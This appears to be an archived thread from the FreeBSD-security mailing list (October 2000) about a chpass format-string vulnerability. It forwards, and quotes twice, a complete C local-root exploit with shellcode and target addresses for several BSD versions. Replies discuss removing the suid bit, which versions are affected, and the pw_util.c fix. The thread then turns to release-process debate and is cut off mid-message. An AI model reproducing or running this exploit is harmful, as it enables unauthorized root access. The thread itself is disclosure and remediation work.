freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 1C1BC37B503 for ; Tue, 3 Oct 2000 22:13:03 -0700 (PDT) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.0/8.9.3) with ESMTP id e945Dit19165 for ; Wed, 4 Oct 2000 01:13:44 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20001004011210.035225e0@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Wed, 04 Oct 2000 01:12:59 -0400 To: freebsd-security@freebsd.org From: Mike Tancsa Subject: Fwd: BSD chpass Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org OK, here is a nasty bugtraq posting :-( ---Mike >Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@lists.securityfocus.com >Delivered-To: bugtraq@securityfocus.com >User-Agent: Mutt/1.2i >Date: Wed, 4 Oct 2000 02:45:48 +1000 >Reply-To: caddis >Sender: Bugtraq List >From: caddis >Subject: BSD chpass >To: BUGTRAQ@SECURITYFOCUS.COM > >/* > * TESO BSD chpass exploit - caddis > * > * greets: #!teso, #!w00w00, #hert!, #ozsecurity, #plus613 > * > */ >#include > >char bsd_shellcode[] = >"\xeb\x16\x5e\x31\xc0\x8d\x0e\x89" >"\x4e\x08\x89\x46\x0c\x8d\x4e\x08" >"\x50\x51\x56\x50\xb0\x3b\xcd\x80" >"\xe8\xe5\xff\xff\xff/bin/sh"; > >char ptmp_shellcode[] = >"\xeb\x26\x5e\x31\xdb\x88\x5e\x07" >"\x89\x76\x12\x89\x5e\x16\x8d\x4e" >"\x12\x8d\x56\x08\x31\xc0\x52\x53" >"\xb0\x0a\xcd\x80\x53\x51\x56\x53" >"\xb0\x3b\xcd\x80\xb0\x01\xcd\x80" >"\xe8\xd5\xff\xff\xff/bin/sh!/etc/ptmp"; > >struct platform { > char *name; > unsigned short count; > unsigned long dest_addr; > unsigned long shell_addr; > char *shellcode; >}; > >struct platform targets[9] = >{ > { "OpenBSD 2.7 i386 ", 141, 0xdfbfd25c, 0xdfbfdc32, > ptmp_shellcode }, > { "OpenBSD 2.6 i386 ", 149, 0xdfbfd224, 0xdfbfdc1a, > ptmp_shellcode }, > { "OpenBSD 2.5 1999/08/06 ", 161, 0xefbfd1a0, 0xefbfdbd6, > ptmp_shellcode }, > { "OpenBSD 2.5 1998/05/28 ", 121, 0xefbfd2b0, 0xefbfdc6e, > ptmp_shellcode }, > { "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, > bsd_shellcode }, > { "FreeBSD 3.5-RELEASE ", 135, 0x804fa58, 0xbfbfdcac, > bsd_shellcode }, > { "FreeBSD 3.4-RELEASE ", 131, 0x804f988, 0xbfbfdcd0, > bsd_shellcode }, > { "NetBSD 1.4.2 ", 132, 0xbfbfd314, 0xbfbfdc36, > bsd_shellcode }, > { NULL, 0, 0, 0, NULL } >}; > >char jmpcode[129]; >char fmt_string[1000]; > >char *args[] = { "chpass", NULL }; >char *envs[] = { jmpcode, fmt_string, NULL }; > >void usage(char *name) >{ > printf("%s \n" > "1 - OpenBSD 2.7 i386\n" > "2 - OpenBSD 2.6 i386\n" > "3 - OpenBSD 2.5 1999/08/06\n" > "4 - OpenBSD 2.5 1998/05/28\n" > "5 - FreeBSD 4.0-RELEASE\n" > "6 - FreeBSD 3.5-RELEASE\n" > "7 - FreeBSD 3.4-RELEASE\n" > "8 - NetBSD 1.4.2\n", name); > exit(1); >} > >int main(int argc, char *argv[]) >{ > char *p; > int x, len = 0; > struct platform *target; > unsigned short low, high; > unsigned long shell_addr[2], dest_addr[2]; > > if (argc != 2) > usage(argv[0]); > > x = atoi(argv[1]) - 1; > if (x > ((sizeof(targets)-sizeof(struct platform)) / sizeof(struct > platform)) - 1 || x < 0) > usage(argv[0]); > > target = &targets[x]; > > memset(jmpcode, 0x90, sizeof(jmpcode)); > strcpy(jmpcode + sizeof(jmpcode) - strlen(target->shellcode), > target->shellcode); > > strcat(fmt_string, "EDITOR="); > for (x = 0; x < target->count; x++) { > strcat(fmt_string, "%8x"); > len += 8; > } > > shell_addr[0] = (target->shell_addr & 0xffff0000) >> 16; > shell_addr[1] = target->shell_addr & 0xffff; > > if (shell_addr[1] > shell_addr[0]) { > dest_addr[0] = target->dest_addr+2; > dest_addr[1] = target->dest_addr; > low = shell_addr[0] - len; > high = shell_addr[1] - low - len; > } else { > dest_addr[0] = target->dest_addr; > dest_addr[1] = target->dest_addr+2; > low = shell_addr[1] - len; > high = shell_addr[0] - low - len; > } > > *(long *)&jmpcode[1] = 0x11111111; > *(long *)&jmpcode[5] = dest_addr[0]; > *(long *)&jmpcode[9] = 0x11111111; > *(long *)&jmpcode[13] = dest_addr[1]; > > p = fmt_string + strlen(fmt_string); > sprintf(p, "%%%dd%%hn%%%dd%%hn", low, high); > > execve("/usr/bin/chpass", args, envs); > perror("execve"); >} -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:15:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 6248337B66C for ; Tue, 3 Oct 2000 22:15:35 -0700 (PDT) Received: (qmail 35521 invoked by uid 1000); 4 Oct 2000 05:16:45 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:16:45 -0000 Date: Wed, 4 Oct 2000 00:16:45 -0500 (CDT) From: Mike Silbersack To: security@freebsd.org Subject: BSD chpass (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For those not subscribed to bugtraq, it's time to remove the suid bit on chpass. Mike "Silby" Silbersack ---------- Forwarded message ---------- Date: Wed, 4 Oct 2000 02:45:48 +1000 From: caddis To: BUGTRAQ@SECURITYFOCUS.COM Subject: BSD chpass /* * TESO BSD chpass exploit - caddis * * greets: #!teso, #!w00w00, #hert!, #ozsecurity, #plus613 * */ #include struct platform targets[9] = { { "OpenBSD 2.7 i386 ", 141, 0xdfbfd25c, 0xdfbfdc32, ptmp_shellcode }, { "OpenBSD 2.6 i386 ", 149, 0xdfbfd224, 0xdfbfdc1a, ptmp_shellcode }, { "OpenBSD 2.5 1999/08/06 ", 161, 0xefbfd1a0, 0xefbfdbd6, ptmp_shellcode }, { "OpenBSD 2.5 1998/05/28 ", 121, 0xefbfd2b0, 0xefbfdc6e, ptmp_shellcode }, { "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, bsd_shellcode }, { "FreeBSD 3.5-RELEASE ", 135, 0x804fa58, 0xbfbfdcac, bsd_shellcode }, { "FreeBSD 3.4-RELEASE ", 131, 0x804f988, 0xbfbfdcd0, bsd_shellcode }, { "NetBSD 1.4.2 ", 132, 0xbfbfd314, 0xbfbfdc36, bsd_shellcode }, { NULL, 0, 0, 0, NULL } }; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:16:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 31BBE37B502 for ; Tue, 3 Oct 2000 22:16:55 -0700 (PDT) Received: (qmail 35532 invoked by uid 1000); 4 Oct 2000 05:18:04 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:18:04 -0000 Date: Wed, 4 Oct 2000 00:18:04 -0500 (CDT) From: Mike Silbersack To: Mike Tancsa Cc: freebsd-security@freebsd.org Subject: Re: Fwd: BSD chpass In-Reply-To: <4.2.2.20001004011210.035225e0@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Mike Tancsa wrote: > OK, here is a nasty bugtraq posting :-( > > ---Mike Doh, your mail arrived while I jumped out to a shell and back in to pine. Sorry for the dupe alert. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:17: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id EE6FA37B66C for ; Tue, 3 Oct 2000 22:16:58 -0700 (PDT) Received: (qmail 79741 invoked by uid 1000); 4 Oct 2000 05:16:53 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:16:53 -0000 Date: Wed, 4 Oct 2000 01:16:50 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Mike Tancsa Cc: freebsd-security@freebsd.org Subject: Re: Fwd: BSD chpass In-Reply-To: <4.2.2.20001004011210.035225e0@mail.sentex.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be vulnerable in a method outside the scope of the posted exploit. I just found out about this 5 minutes and ran to turn off the suid bit :P On Wed, 4 Oct 2000, Mike Tancsa wrote: : Date: Wed, 4 Oct 2000 01:12:59 -0400 : From: Mike Tancsa : To: freebsd-security@freebsd.org : Subject: Fwd: BSD chpass : : : OK, here is a nasty bugtraq posting :-( : : ---Mike : : : >Approved-By: aleph1@SECURITYFOCUS.COM : >Delivered-To: bugtraq@lists.securityfocus.com : >Delivered-To: bugtraq@securityfocus.com : >User-Agent: Mutt/1.2i : >Date: Wed, 4 Oct 2000 02:45:48 +1000 : >Reply-To: caddis : >Sender: Bugtraq List : >From: caddis : >Subject: BSD chpass : >To: BUGTRAQ@SECURITYFOCUS.COM : > : >/* : > * TESO BSD chpass exploit - caddis : > * : > * greets: #!teso, #!w00w00, #hert!, #ozsecurity, #plus613 : > * : > */ : >#include : > : >char bsd_shellcode[] = : >"\xeb\x16\x5e\x31\xc0\x8d\x0e\x89" : >"\x4e\x08\x89\x46\x0c\x8d\x4e\x08" : >"\x50\x51\x56\x50\xb0\x3b\xcd\x80" : >"\xe8\xe5\xff\xff\xff/bin/sh"; : > : >char ptmp_shellcode[] = : >"\xeb\x26\x5e\x31\xdb\x88\x5e\x07" : >"\x89\x76\x12\x89\x5e\x16\x8d\x4e" : >"\x12\x8d\x56\x08\x31\xc0\x52\x53" : >"\xb0\x0a\xcd\x80\x53\x51\x56\x53" : >"\xb0\x3b\xcd\x80\xb0\x01\xcd\x80" : >"\xe8\xd5\xff\xff\xff/bin/sh!/etc/ptmp"; : > : >struct platform { : > char *name; : > unsigned short count; : > unsigned long dest_addr; : > unsigned long shell_addr; : > char *shellcode; : >}; : > : >struct platform targets[9] = : >{ : > { "OpenBSD 2.7 i386 ", 141, 0xdfbfd25c, 0xdfbfdc32, : > ptmp_shellcode }, : > { "OpenBSD 2.6 i386 ", 149, 0xdfbfd224, 0xdfbfdc1a, : > ptmp_shellcode }, : > { "OpenBSD 2.5 1999/08/06 ", 161, 0xefbfd1a0, 0xefbfdbd6, : > ptmp_shellcode }, : > { "OpenBSD 2.5 1998/05/28 ", 121, 0xefbfd2b0, 0xefbfdc6e, : > ptmp_shellcode }, : > { "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, : > bsd_shellcode }, : > { "FreeBSD 3.5-RELEASE ", 135, 0x804fa58, 0xbfbfdcac, : > bsd_shellcode }, : > { "FreeBSD 3.4-RELEASE ", 131, 0x804f988, 0xbfbfdcd0, : > bsd_shellcode }, : > { "NetBSD 1.4.2 ", 132, 0xbfbfd314, 0xbfbfdc36, : > bsd_shellcode }, : > { NULL, 0, 0, 0, NULL } : >}; : > : >char jmpcode[129]; : >char fmt_string[1000]; : > : >char *args[] = { "chpass", NULL }; : >char *envs[] = { jmpcode, fmt_string, NULL }; : > : >void usage(char *name) : >{ : > printf("%s \n" : > "1 - OpenBSD 2.7 i386\n" : > "2 - OpenBSD 2.6 i386\n" : > "3 - OpenBSD 2.5 1999/08/06\n" : > "4 - OpenBSD 2.5 1998/05/28\n" : > "5 - FreeBSD 4.0-RELEASE\n" : > "6 - FreeBSD 3.5-RELEASE\n" : > "7 - FreeBSD 3.4-RELEASE\n" : > "8 - NetBSD 1.4.2\n", name); : > exit(1); : >} : > : >int main(int argc, char *argv[]) : >{ : > char *p; : > int x, len = 0; : > struct platform *target; : > unsigned short low, high; : > unsigned long shell_addr[2], dest_addr[2]; : > : > if (argc != 2) : > usage(argv[0]); : > : > x = atoi(argv[1]) - 1; : > if (x > ((sizeof(targets)-sizeof(struct platform)) / sizeof(struct : > platform)) - 1 || x < 0) : > usage(argv[0]); : > : > target = &targets[x]; : > : > memset(jmpcode, 0x90, sizeof(jmpcode)); : > strcpy(jmpcode + sizeof(jmpcode) - strlen(target->shellcode), : > target->shellcode); : > : > strcat(fmt_string, "EDITOR="); : > for (x = 0; x < target->count; x++) { : > strcat(fmt_string, "%8x"); : > len += 8; : > } : > : > shell_addr[0] = (target->shell_addr & 0xffff0000) >> 16; : > shell_addr[1] = target->shell_addr & 0xffff; : > : > if (shell_addr[1] > shell_addr[0]) { : > dest_addr[0] = target->dest_addr+2; : > dest_addr[1] = target->dest_addr; : > low = shell_addr[0] - len; : > high = shell_addr[1] - low - len; : > } else { : > dest_addr[0] = target->dest_addr; : > dest_addr[1] = target->dest_addr+2; : > low = shell_addr[1] - len; : > high = shell_addr[0] - low - len; : > } : > : > *(long *)&jmpcode[1] = 0x11111111; : > *(long *)&jmpcode[5] = dest_addr[0]; : > *(long *)&jmpcode[9] = 0x11111111; : > *(long *)&jmpcode[13] = dest_addr[1]; : > : > p = fmt_string + strlen(fmt_string); : > sprintf(p, "%%%dd%%hn%%%dd%%hn", low, high); : > : > execve("/usr/bin/chpass", args, envs); : > perror("execve"); : >} : : -------------------------------------------------------------------- : Mike Tancsa, tel +1 519 651 3400 : Network Administration, mike@sentex.net : Sentex Communications www.sentex.net : Cambridge, Ontario Canada www.sentex.net/mike : : : : To Unsubscribe: send mail to majordomo@FreeBSD.org : with "unsubscribe freebsd-security" in the body of the message : * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.3 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE52r1FdMMtMcA1U5ARAnXAAKDhwrEZYJf6/88mIaFOgPFVgGl3SACfTWwx L1I064VgjK87cIBOI3FonT8= =Jzcy -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:23:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 4DBBE37B502 for ; Tue, 3 Oct 2000 22:23:09 -0700 (PDT) Received: (qmail 35608 invoked by uid 1000); 4 Oct 2000 05:24:19 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Oct 2000 05:24:19 -0000 Date: Wed, 4 Oct 2000 00:24:19 -0500 (CDT) From: Mike Silbersack To: Matt Heckaman Cc: Mike Tancsa , freebsd-security@freebsd.org Subject: Re: Fwd: BSD chpass In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Oct 2000, Matt Heckaman wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on > my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be > vulnerable in a method outside the scope of the posted exploit. I just > found out about this 5 minutes and ran to turn off the suid bit :P Unless the nsswitch changes fixed it, 4.1.1 should still be vulnerable - there are no messages in the cvs logs for chpass indicating any security-related changes recently. (For both FreeBSD and OpenBSD.) Looks like the guy didn't want to talk to vendors before posting. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:38:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from netplex.com.au (adsl-63-207-30-186.dsl.snfc21.pacbell.net [63.207.30.186]) by hub.freebsd.org (Postfix) with ESMTP id 9EB3637B502 for ; Tue, 3 Oct 2000 22:38:56 -0700 (PDT) Received: from netplex.com.au (peter@localhost [127.0.0.1]) by netplex.com.au (8.11.0/8.9.3) with ESMTP id e945cfH18681; Tue, 3 Oct 2000 22:38:41 -0700 (PDT) (envelope-from peter@netplex.com.au) Message-Id: <200010040538.e945cfH18681@netplex.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: Mike Silbersack Cc: Matt Heckaman , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: BSD chpass In-Reply-To: Date: Tue, 03 Oct 2000 22:38:41 -0700 From: Peter Wemm Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 4.1-RELEASE and 4.1.1-RELEASE are not vulnerable to this. The following change in usr.sbin/vipw/pw_util.c fixed the problem: revision 1.18 date: 2000/07/12 00:49:40; author: kris; state: Exp; lines: +2 -2 Don't call warn() without a format string. and it was MFC'ed prior to 4.1-REL: revision 1.17.2.1 date: 2000/07/20 10:35:27; author: kris; state: Exp; lines: +1 -1 MFC: Don't call vfprintf-like functions without a format string. It just goes to show how an innocent quirk can break things. (You can verify that this was the overflow by reverting the change and then the exploit either works or causes a segfault) Anybody know about the openbsd-specific ptmp bug? Does that affect us too? Mike Silbersack wrote: > > On Wed, 4 Oct 2000, Matt Heckaman wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on > > my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be > > vulnerable in a method outside the scope of the posted exploit. I just > > found out about this 5 minutes and ran to turn off the suid bit :P > > Unless the nsswitch changes fixed it, 4.1.1 should still be vulnerable - > there are no messages in the cvs logs for chpass indicating any > security-related changes recently. (For both FreeBSD and OpenBSD.) > > Looks like the guy didn't want to talk to vendors before posting. > > Mike "Silby" Silbersack > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > Cheers, -Peter -- Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 22:44:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from peach.ocn.ne.jp (peach.ocn.ne.jp [210.145.254.87]) by hub.freebsd.org (Postfix) with ESMTP id 4241337B66C; Tue, 3 Oct 2000 22:44:22 -0700 (PDT) Received: from newsguy.com (p06-dn01kiryunisiki.gunma.ocn.ne.jp [211.0.245.7]) by peach.ocn.ne.jp (8.9.1a/OCN/) with ESMTP id OAA08696; Wed, 4 Oct 2000 14:44:08 +0900 (JST) Message-ID: <39DAC368.C6C213B7@newsguy.com> Date: Wed, 04 Oct 2000 14:43:04 +0900 From: "Daniel C. Sobral" X-Mailer: Mozilla 4.7 [en] (Win98; I) X-Accept-Language: en,pt-BR MIME-Version: 1.0 To: Kris Kennaway Cc: Warner Losh , Paul Richards , cvs-committers@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <39DA182C.C70ED553@originative.co.uk> <200010031800.MAA27859@harmony.village.org> <20001003162720.D51546@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > I think a formal MFC process may be too stifling, unless we have a > VERY responsive MFC team. Consider that we don't want the same thing > to happen as did with 3.x, where 4.0-CURRENT was allowed to diverge so > much that merging bugfixes became difficult. I don't think the comparision is appropriate. The divergence between 3.x and 4.x came at the very beginning of 3.x's life, and it was not merged back because it was too big a change. -- Daniel C. Sobral (8-DCS) dcs@newsguy.com dcs@freebsd.org capo@linux.bsdconspiracy.net the ants all left because mtn. dew is sold out again To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23: 8:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 9CE1237B502 for ; Tue, 3 Oct 2000 23:08:42 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id AAA27863; Wed, 4 Oct 2000 00:08:26 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003235232.0499b980@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 04 Oct 2000 00:08:23 -0600 To: Matt Heckaman , Mike Tancsa From: Brett Glass Subject: Re: Fwd: BSD chpass Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: <4.2.2.20001004011210.035225e0@mail.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 4.1-RELEASE and 4.1-STABLE do not seem to be vulnerable because the format string bug upon which the exploit relies is gone. (It took me awhile to hunt this one down. It was in /src/usr.sbin/vipw/pw_util.c -- not in the directory with the source for chpass itself.) 4.0-RELEASE and all earlier releases I've tested seem to be vulnerable. --Brett At 11:16 PM 10/3/2000, Matt Heckaman wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >I've confirmed this to work on 3.5-STABLE as of Sep 21. It did NOT work on >my 4.1-STABLE or 4.1.1-RELEASE machines, but they could still be >vulnerable in a method outside the scope of the posted exploit. I just >found out about this 5 minutes and ran to turn off the suid bit :P To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23:11:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from lucifer.ninth-circle.org (lucifer.bart.nl [194.158.168.74]) by hub.freebsd.org (Postfix) with ESMTP id E1E7437B502; Tue, 3 Oct 2000 23:11:06 -0700 (PDT) Received: (from asmodai@localhost) by lucifer.ninth-circle.org (8.11.0/8.11.0) id e946ApA97021; Wed, 4 Oct 2000 08:10:51 +0200 (CEST) (envelope-from asmodai) Date: Wed, 4 Oct 2000 08:10:51 +0200 From: Jeroen Ruigrok van der Werven To: Brett Glass Cc: Bill Fumerola , Warner Losh , Paul Richards , cvs-committers@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: STABLE support team [Was: cvs commit: src/usr.bin/finger finger.c] Message-ID: <20001004081051.C96772@lucifer.bart.nl> References: <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <200010031800.MAA27859@harmony.village.org> <4.3.2.7.2.20001003125150.04c7f3f0@localhost> <20001003163020.B38472@jade.chc-chimes.com> <4.3.2.7.2.20001003161654.00de6b60@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001003161654.00de6b60@localhost>; from brett@lariat.org on Tue, Oct 03, 2000 at 04:27:43PM -0600 Organisation: VIA Net.Works The Netherlands Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -On [20001004 00:30], Brett Glass (brett@lariat.org) wrote: >As you know, the purpose of 4.1.1 was to roll cryptography into -STABLE in the >wake of the expiration of the RSA patent. A good thing, of course, but there >are still some glitches in 4.1.1 that I expect will be fixed by 4.2. Oh? I fail to see any PR's raised on the glitches so that they can actually be archived, looked upon and examined and fixed. That's common practice for everyone, or like Bill Paul used to say: I can't see your box from over here. -- Jeroen Ruigrok van der Werven Network- and systemadministrator VIA Net.Works The Netherlands BSD: Technical excellence at its best http://www.via-net-works.nl Grant me the serenity to accept the things I cannot change, courage to change the things I can, and wisdom to know the difference... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23:14:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from lucifer.ninth-circle.org (lucifer.bart.nl [194.158.168.74]) by hub.freebsd.org (Postfix) with ESMTP id 62B5037B502; Tue, 3 Oct 2000 23:14:13 -0700 (PDT) Received: (from asmodai@localhost) by lucifer.ninth-circle.org (8.11.0/8.11.0) id e946DuP97032; Wed, 4 Oct 2000 08:13:56 +0200 (CEST) (envelope-from asmodai) Date: Wed, 4 Oct 2000 08:13:56 +0200 From: Jeroen Ruigrok van der Werven To: Brett Glass Cc: Alfred Perlstein , Peter Wemm , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004081356.D96772@lucifer.bart.nl> References: <200010032326.e93NQ7H17213@netplex.com.au> <20001003155638.B73409@hub.freebsd.org> <200010032326.e93NQ7H17213@netplex.com.au> <20001003164236.Q27736@fw.wintelcom.net> <4.3.2.7.2.20001003175130.043dc4c0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001003175130.043dc4c0@localhost>; from brett@lariat.org on Tue, Oct 03, 2000 at 05:55:55PM -0600 Organisation: VIA Net.Works The Netherlands Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -On [20001004 02:00], Brett Glass (brett@lariat.org) wrote: [differences between userland and kernel MFC's] >What about root compromises in userland -- e.g. in setuid apps, daemons >that run (or at least start) as root, etc.? Security fixes are always special cases. -- Jeroen Ruigrok van der Werven Network- and systemadministrator VIA Net.Works The Netherlands BSD: Technical excellence at its best http://www.via-net-works.nl Grant me the serenity to accept the things I cannot change, courage to change the things I can, and wisdom to know the difference... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 23:16:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from lucifer.ninth-circle.org (lucifer.bart.nl [194.158.168.74]) by hub.freebsd.org (Postfix) with ESMTP id B169E37B502; Tue, 3 Oct 2000 23:16:17 -0700 (PDT) Received: (from asmodai@localhost) by lucifer.ninth-circle.org (8.11.0/8.11.0) id e946G4v97096; Wed, 4 Oct 2000 08:16:04 +0200 (CEST) (envelope-from asmodai) Date: Wed, 4 Oct 2000 08:16:04 +0200 From: Jeroen Ruigrok van der Werven To: Jordan Hubbard Cc: Paul Richards , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001004081604.E96772@lucifer.bart.nl> References: <84077.970617261@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <84077.970617261@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Tue, Oct 03, 2000 at 04:54:21PM -0700 Organisation: VIA Net.Works The Netherlands Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -On [20001004 01:55], Jordan Hubbard (jkh@winston.osd.bsdi.com) wrote: >> I think you're looking at it the wrong way around. The stable team >> wouldn't be putting in a lot of hours reviewing stable commits. > >Fine, change "reviewing" to "doing" and my original point still holds. >How many hours are you and the other developers who volunteer willing >to commit to this? That's all I want to know and it's a reasonable >question to ask. I did a lot of MFC's over the last months with some weeks more productivity than others depending on the amount of projects I am involved in at work. And I will continue to regularly review the diffs between 3 and 4, 4 and 5, and 